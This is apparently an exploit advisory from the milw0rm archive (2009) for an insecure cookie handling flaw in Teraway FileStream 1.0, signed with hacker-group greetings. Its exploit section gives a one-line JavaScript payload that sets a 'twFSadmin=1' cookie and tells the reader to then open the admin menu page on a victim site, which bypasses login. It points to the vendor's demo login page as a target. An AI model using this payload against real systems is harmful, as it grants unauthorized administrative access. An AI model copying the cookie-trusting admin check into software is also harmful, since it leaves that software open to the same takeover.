29 lines
No EOL
798 B
Text
29 lines
No EOL
798 B
Text
-------------------------------------[+]
|
|
Homepage:http://www.teraway.com
|
|
Product: Teraway FileStream 1.0
|
|
home:www.h4ckf0ru.com
|
|
Note: Hawach x.CJP.x Ballk Ma tedirech Ihdae
|
|
Note: Ya Jma3a Ana AfLawi Horr
|
|
-------------------------------------
|
|
Teraway FileStream 1.0 Insecure Cookie Handling Vuln
|
|
-------------------------------------
|
|
Exploit:
|
|
--------
|
|
|
|
javascript:document.cookie="twFSadmin=1;path=/";
|
|
Then Go to http://victim/path/menu.asp
|
|
|
|
demo
|
|
----
|
|
http://www.teraway.com/filestream/demo/login.asp
|
|
|
|
|
|
--------------------------------------------------
|
|
Greetz to :
|
|
[+] Super_Cristal (My Master) Dos-Dz Team Snakes TeaM
|
|
SuB-ZeRo x.CJP.x Mr.tro0oqy - Cyber-Zone- ZoRLu
|
|
And ALL Members Of anti-intruders.org
|
|
ALL My Friends (Dz)
|
|
[+]-------------------------------------[+]
|
|
|
|
# milw0rm.com [2009-04-27] |